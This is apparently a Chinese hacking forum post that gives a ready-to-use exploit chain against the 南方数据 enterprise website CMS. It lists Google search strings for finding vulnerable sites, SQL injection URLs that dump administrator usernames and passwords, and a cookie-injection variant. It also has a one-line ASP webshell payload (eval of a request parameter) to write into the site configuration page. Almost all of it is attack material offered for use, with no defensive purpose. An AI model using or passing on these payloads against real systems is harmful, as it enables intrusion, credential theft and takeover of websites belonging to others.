南方数据企业网站管理系统产品模块使用了全新的无限分类,并且可根据产品自己展开分类. 生成静态html网页,全站使用DIV+CSS排版,极大提升网站访问速度,更有利于搜索引擎收录数量和网店排名,兼容目前主流浏览器, ...
漏洞利用:
google关键字:inurl:HomeMarket.asp
EXP: http://www.hackqing.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%
20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
爆出管理员帐号,密码 。破解
默认后台:/admin
获取shell方法: 在网站配置[http://www.XXXX.com/admin/SiteConfig.asp]的版权信息里写入
"%><%eval(request(chr(35)))%><%'
成功把shell写入
http://www.XXXX.com/inc/config.asp
2、inurl:Shownews.asp?
"%><%eval request("#")%><%'javascript:alert(document.cookie="id="+escape("id"))javascript:alert(document.cookie="id="+escape
("111 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"))
|